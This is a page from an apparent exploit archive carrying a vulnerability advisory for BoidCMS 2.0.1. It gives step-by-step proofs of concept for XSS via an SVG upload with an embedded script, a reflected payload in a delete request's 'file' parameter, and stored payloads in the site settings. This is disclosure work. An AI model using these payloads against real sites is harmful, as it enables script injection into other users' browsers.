Home[1] Files[2] News[3] &[SERVICES_TAB] Contact[4] Add New[5]
- BoidCMS 2.0.1 Cross Site Scripting[6]
- Authored by Andrey Stoykov[7]
-
BoidCMS version 2.0.1 suffers from multiple cross site scripting vulnerabilities. Original discovery of cross site scripting in this version is attributed to Rahad Chowdhury in December of 2023, though this advisory provides additional vectors of attack.
- SHA-256 |
399c7d150c74e14ff960b4352508c5f4a2a59bf2bfe1f4f390b71685d91640df
- Download[8] | Favorite[9] | View[10]
Change Mirror[11] Download[12]
# Exploit Title: Multiple XSS Issues in boidcmsv2.0.1
# Date: 3/2024
# Exploit Author: Andrey Stoykov
# Version: 2.0.1
# Tested on: Ubuntu 22.04
# Blog: http://msecureltd.blogspot.com
XSS via SVG File Upload
Steps to Reproduce:
1. Login with admin user
2. Visit "Media" page
3. Upload xss.svg
4. Click "View" and XSS payload will execute
// xss.svg contents
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "
http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900"
stroke="#004400"/>
<script type="text/javascript">
alert(`XSS`);
</script>
</svg>
Reflected XSS:
Steps to Reproduce:
1. Login as admin
2. Visit "Media" page
3. Click "Delete" and intercept the HTTP GET request
4. In "file" parameter add the payload "<script>alert(1)</script>"
5. After forwarding the HTTP GET request a browser popup would surface
Stored XSS:
Steps to Reproduce:
1. Login as admin
2. Visit "Settings" page
3. Enter XSS payload in "Title", "Subtitle", "Footer"
4. Then visit the blog page
File Tags
- ActiveX[18] (933)
- Advisory[19] (84,346)
- Arbitrary[20] (16,578)
- BBS[21] (2,859)
- Bypass[22] (1,818)
- CGI[23] (1,032)
- Code Execution[24] (7,578)
- Conference[25] (687)
- Cracker[26] (844)
- CSRF[27] (3,370)
- DoS[28] (24,366)
- Encryption[29] (2,381)
- Exploit[30] (52,607)
- File Inclusion[31] (4,245)
- File Upload[32] (982)
- Firewall[33] (822)
- Info Disclosure[34] (2,832)
- Intrusion Detection[35] (905)
- Java[36] (3,117)
- JavaScript[37] (887)
- Kernel[38] (6,943)
- Local[39] (14,656)
- Magazine[40] (586)
- Overflow[41] (12,981)
- Perl[42] (1,430)
- PHP[43] (5,174)
- Proof of Concept[44] (2,364)
- Protocol[45] (3,687)
- Python[46] (1,595)
- Remote[47] (31,289)
- Root[48] (3,613)
- Rootkit[49] (519)
- Ruby[50] (616)
- Scanner[51] (1,647)
- Security Tool[52] (7,962)
- Shell[53] (3,236)
- Shellcode[54] (1,217)
- Sniffer[55] (899)
- Spoof[56] (2,255)
- SQL Injection[57] (16,491)
- TCP[58] (2,420)
- Trojan[59] (688)
- UDP[60] (896)
- Virus[61] (668)
- Vulnerability[62] (32,459)
- Web[63] (9,835)
- Whitepaper[64] (3,768)
- x86[65] (966)
- XSS[66] (18,127)
- Other[67]
File Archives
- March 2024[68]
- February 2024[69]
- January 2024[70]
- December 2023[71]
- November 2023[72]
- October 2023[73]
- September 2023[74]
- August 2023[75]
- July 2023[76]
- June 2023[77]
- May 2023[78]
- April 2023[79]
- Older[80]
Systems
- AIX[81] (429)
- Apple[82] (2,060)
- BSD[83] (375)
- CentOS[84] (57)
- Cisco[85] (1,926)
- Debian[86] (6,977)
- Fedora[87] (1,693)
- FreeBSD[88] (1,246)
- Gentoo[89] (4,466)
- HPUX[90] (880)
- iOS[91] (369)
- iPhone[92] (108)
- IRIX[93] (220)
- Juniper[94] (69)
- Linux[95] (48,763)
- Mac OS X[96] (691)
- Mandriva[97] (3,105)
- NetBSD[98] (256)
- OpenBSD[99] (487)
- RedHat[100] (15,184)
- Slackware[101] (941)
- Solaris[102] (1,611)
- SUSE[103] (1,444)
- Ubuntu[104] (9,333)
- UNIX[105] (9,371)
- UnixWare[106] (187)
- Windows[107] (6,635)
- Other[108]
- Services
- Security Services[119]
- Hosting By
- Rokasec[120]